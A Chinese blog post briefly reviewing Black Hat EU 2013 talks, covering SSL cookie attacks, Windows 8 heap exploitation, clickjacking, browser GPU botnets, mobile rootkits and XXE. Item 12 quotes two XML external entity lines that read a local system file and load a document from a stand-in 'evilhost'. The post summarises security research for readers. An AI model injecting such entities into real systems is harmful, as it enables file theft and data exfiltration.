• Blackhat EU 2013 黑客大会(Full Schedule for Black Hat USA 2013)


    大会文档下载:https://www.blackhat.com/eu-13/archives.html

    此次BH EU 议题整体较水,涉及系统安全、移动安全、网络传输安全、WEB安全、游戏安全等。下面随便挑几个议题简单介绍下,有些议题不是很感兴趣,有些也特水,有兴趣的自己到上面链接下载文档。

    1、《A PERFECT CRIME? ONLY TIME WILL TELL》

    讲述SSL攻击方法——CRIME,如何从SSL加密的会话中获取到cookie,CRIME原理就是通过在受害者的浏览器中运行JavaScript代 码并同时监听HTTPS传输数据,进而解密会话Cookie,也算是中间人攻击MIMT的一种方法。该议题对CRIME方法进行扩展,介绍一种叫 TIME (Timing Info-leak MadeEasy)的攻击手法,基于传输时间来猜测payload size,然后逐字猜解 cookie。

    2、《ADVANCED HEAP MANIPULATION IN WINDOWS 8》

    介绍常堆及内核溢出利用技巧,以及在win8上改进后的内存安全保护机制。里面构造堆内存布局的exploit技巧,与以往利用信息泄露获取dll基址来 绕过ASLR方法有些类似,都通过分配特定大小的堆块,然后释放出与造成溢出的堆块大小相同的堆块,触发漏洞后覆盖到特定结构。同时,介绍了内核中的堆块 分配与释放的原理,然后讲述不同大小的堆块溢出后,如何构造相应的堆布局来实现利用。最后,以windows object内核漏洞为例,讲述 win7win8上的exploit技巧,在wihte paper中已给出相应的exploit代码。

    3、《THE DEPUTIES ARE STILL CONFUSED》


    总之,这议题很水,爱看不看。主要讲CSRF和点击劫持clickjacking的攻击技巧,里面也提到前段时间facebook爆出的OAuth2认证 漏洞,点击劫持就讲下beef的clickjacking模块,然后提下防御点击劫持的x-frame-options,

    4、《Hacking Appliances: Ironic exploits in security products》

    初看这标题,还以为是讲客户端软件漏洞利用呢,其实主要还是讲WEB安全的多一些,觉得有点水。

    5、《HACKING VIDEO CONFERENCING SYSTEMS》

    比较有趣的一个议题,主要讲述如何攻击语音会议系统,介绍了root提权以及远程调试的一些技巧,最后演示了一个后门shell。对这些不是很了解,有兴趣的自己看文档。

    6、《Hardening your Windows 8 apps for the Windows Store》

    很水,不解释

    7、《Harnessing GP²Us Building Better Browser Based Botnets》

    觉得这议题有点在玩概念,实际攻击场景或者实战的东西很少,太理论化了。GPU现在很多被用在暴力破解方面,比如跑MD5、跑WPA-PSK,速度比 CPU快得N多,比五速鞋还五速鞋……该议题主要讲构造基于浏览器的僵尸网络botnet,利用WEB漏洞(如XSS,并提到利用html5的WEB存储 特性、插件等等方法实现永久XSS)来执行代码,再用GPU跑数据,然后利用C&C服务器进行通讯。

    8、《LET'S PLAY - APPLANTING》

    很水,为什么这种也能上BH大会讲呢

    9、《MULTIPLAYER ONLINE GAMES INSECURITY》

    讲游戏漏洞相关的,主要涉及协议分析、常见客户端漏洞攻击等,没什么新鲜的东西,爱看不看。

    10、《Next generation mobile rootkits》

    相对比较前沿的东西,主要讲arm平台上的rookit设计,但PPT写得太简洁了,简单一些文本描述,很难完全理解其中意思。之前 viaForensics也写一篇关于android rootkit的文档《Dude,where’s my droid?!》,发表于 RootedCON 2013安全大会,推荐阅读。

    11、《POWER ANALYSIS ATTACKS FOR CHEAPSKATES》

    可能一些搞硬件hacking或者移动安全的朋友会感兴趣,应该属于边信道攻击一类,玩这种都需要花钱买设备,所以搞这些的一般都是高富帅,像kevin2600一样。

    12、《XML Out-Of-Band Data Retrieval》

    这种XML实体注入漏洞,在2011年的时候,80sec就有写过一篇文章提到《XML实体注入漏洞安全警告》http://www.80sec.com/xml-entity-injection.html,比如可用于读取文件,加载远程页面:

    <!ENTITY % payload SYSTEM "file:///c:/boot.ini">
    <!ENTITY % remote SYSTEM "http://evilhost/evil.xml">

    漏洞实例见《zend framework文件读取漏洞分析》http://zone.wooyun.org/content/508:,不过最早是在2002年的时候老外就有提出过这个问题。

    13、《Advanced iOS Application Pentesting》

    看标题冒似很“高级”的样子,实则就介绍下ios的一些逆向工具和ios编程中用到的一些类而已,还是爱看不看。

    14、《APPLICATION DEVELOPMENT SECURE CODING WORKSHOP》

    主要讲WEB开发中安全编程,但主要就是在普及WEB安全漏洞的原理、防御等,包括XSS、注入、CSRF等等,算是总结性文章,没有新货,有兴趣的自个翻看下。

    15、《Assessing BYOD with the Smarthpone Pentest Framework》

    作者公布了一款智能机渗透测试框架——Smartphone Pentest Framework v0.1.5,包括一些浏览器漏洞、客户端漏洞、社会 工程学漏洞以及本地提权等,利用漏洞获取shell后还可发送短信、获取通信录、短信、下载上传文件等,有些功能还是不错的,但漏洞利用方法相对单一,有 其利用的局限性。该工具下载地址:

    https://github.com/georgiaw/Smartphone-Pentest-Framework

    详情关注 http://www.blackhat.com/

  • 相关阅读:
    团队与领导力健康检查 | 体检表
    如何改变组织文化
    如何在各种文化背景下成功敏捷
    OKR痛点与误区 | 敏捷家分享007
    Scrum培训感想
    如何讲好故事
    Lc70_爬楼梯
    Lc641_设计循环双端队列
    Lc32_最长有效括号
    Lc239_滑动窗口最大值
  • 原文地址:https://www.cnblogs.com/microzone/p/3234171.html
Copyright © 2020-2023  润新知